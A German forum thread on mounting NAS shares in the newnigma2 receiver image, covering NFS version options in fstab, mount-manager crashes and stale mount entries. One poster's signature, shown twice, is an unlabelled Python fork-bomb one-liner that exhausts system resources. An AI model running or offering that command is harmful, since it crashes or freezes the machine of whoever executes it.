NAS in newnigma2 einbinden

    • Wobei interessant wäre, wie das NAS eingebunden wurde. Ich habe auch vor einigen Wochen das autofs gelöscht und alle Netzwerkfreigaben mit dem Netzwerkbrowser neu eingebunden.
      Nach der neuen Methode mit dem Netzwerkbrowser bzw. Mount Manager werden doch Netzwerkmounts in die /etc/fstab geschrieben, oder liege ich da falsch? Mir ist kürzlich aufgefallen, dass dort überall das vers=3 drinsteht.

      Wollte ich sowieso mal fragen, wird mit der neuen Methode grundsätzlich alles, egal ob OE 2.0 oder OE 2.5, mit vers=3 gemountet?
    • In dem Netzwerkbrowser von unserem feed hab ich nen kleines update drinn unter anderem wenn keine version angegeben wird nimmt er version 3 und noch ein paar andere dinge.
      Die änderungen könnt ihr euch in der py angucken die hab ich reingebaut wegen diverser probleme .
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • So, jetzt funktioniert alles. Es war ein Fehler in der Freigabe des Nas für Unterordner...

      Habe nur noch ein Problem mit der Box. Wenn ich in der Mountübersicht Einträge mit der Gelben Taste löschen will, geht das nicht. Habe die betreffenden Mounts auf aus gestellt. Im Kästchen ist ein rotes "x". Also deaktiv. Aber ich kann die alten Mounts nicht löschen. Hat da jemand nen Tip?
    • @kati910
      Muss ich nach Deinem update bei funktionierendem Ver=4 Mount im Mountmanagerwas ergänzen, damit der mount weiter mit Vers=4 funktioniert oder kann es diesbezüglich "leer bleiben", wie bisher?
      schrieb der Burkhardtsdorfer

      To be is to do - Socrates
      To do is to be - Sartre
      Do Be Do Be Do - Sinatra
    • Aber eines gleich vorweg diese änderungen sind ausschließlich für die mount optionen wie sie in der fstab stehen sollen bei neu geflashten images geht das ohne zutun bei bestehenden mounts in der fstab sollte man die netzwerkmounts daraus löschen und einfach neustarten die einträge werde nach neuen regelen geschrieben.automatisch
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Da ich immer gerne alles ausprobiere, habe ich bei einem Netzwerkmount mal in der "Freigaben Verwaltung" unter "Freigabeotionen" vers=4 eingetragen. Als ich bei der letzten Frage, die Freigabe sei schon vorhanden und ob überschrieben werden soll, OK gedrückt habe, gabe es einen GS. Nachdem der GUI wieder da war, waren in Einstellungen/Netzwerk die Einträge "Netzwerkbrowser" und "Mountmanager" verschwunden.
      In der fstab stand immer noch "vers=3" bei dem Netzwerkmount.

      Ich habe inzwischen eine Sicherung vom Wochenende zurückgeflasht.

      PS: Das war der Eintrag, bei dem ich vers=4 eingegeben habe (Zeile 705 + 706):

      Quellcode

      1. [1;33mW/ [AutoMount.setMountAttributes] :: before: {'username': '', 'sharedir': '/media/hdd/movie', 'sharename': 'Wohnzimmer', 'hdd_replacement': False, 'isMounted': True, 'ip': '192.168.178.16', 'active': True, 'password': '', 'options': '', 'mounttype': 'nfs'}[1;m
      2. [1;33mW/ [AutoMount.setMountAttributes] :: after: {'username': '', 'sharedir': 'media/hdd/movie', 'sharename': 'Wohnzimmer', 'hdd_replacement': False, 'isMounted': True, 'ip': '192.168.178.16', 'active': True, 'password': '', 'options': 'vers=4', 'mounttype': 'nfs'}[1;m
      Dateien

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von goliath ()

    • kati910 schrieb:

      Zeige mal die jetztige fstab
      Geht nicht, da ich ja schon ein Backup zurückgeflasht habe. Ich hatte mir die fstab nur vor dem Rückflashen des Backup angeschaut und da habe ich keine Änderungen gesehen, es stand auf jeden Fall bei allen Netzwerkmounts imer noch vers=3, das habe ich kontrolliert.

      Ich könnte höchstens die Aktion nochmal probieren.
    • Hi,

      ich habe es gerade mal getestet; Also die mounts mit der gelben Taste löschen,
      funktioniert einwandfrei.
      Das ganze crashed dann, wenn irgendwo alte Mounteinträge, die
      manuell erstellt wurden noch aktiv sind,

      Diese muss man halt suchen . Musste ich auch. Hat auch länger gedauert.

      greetings
    • ich habe glaube ich ein ähnliches Problem (DM 500 v2 hd.

      Mein letztes weekly Image update vom November 2016 hat plötzlich nicht mehr das Verzeichnis das ich mit automount konfiguriert hatte
      Media -fstype=cifs,rw,nolock,soft,tcp,noperm,noserverino,rsize=8192,wsize=8192,user=xxx,pass=xxx ://192.168.0.333/media" gefunden.
      Also weekly update vom Juni aufgespielt und meine alte automount übertragen. Ergebnis: es dauert ewig bis das Verzeichnis angezeigt wird und schließlich dreht das
      Rad dauer. dann mittels on board netzwerkmanager das Verzeichnis des NAS eingestellt (grüner Haken) und das Verzeichnis wurde sofort im Media Player angezeigt und Filme waren abspielbar - nach wenigen Minuten brach die Verbindung ab und die NAS Folder wurden nicht mehr angezeigt

      Eine Idee woran es hapert??
    • FritzvK schrieb:

      ich habe glaube ich ein ähnliches Problem (DM 500 v2 hd.
      Garantiert nicht, da du ein ganz anderes Image verwendest und die Handhabung von Mounts im OE2.0 anders ist.
      Mach bitte einen eigenen Thread im richtigen Bereich zu deiner Box auf.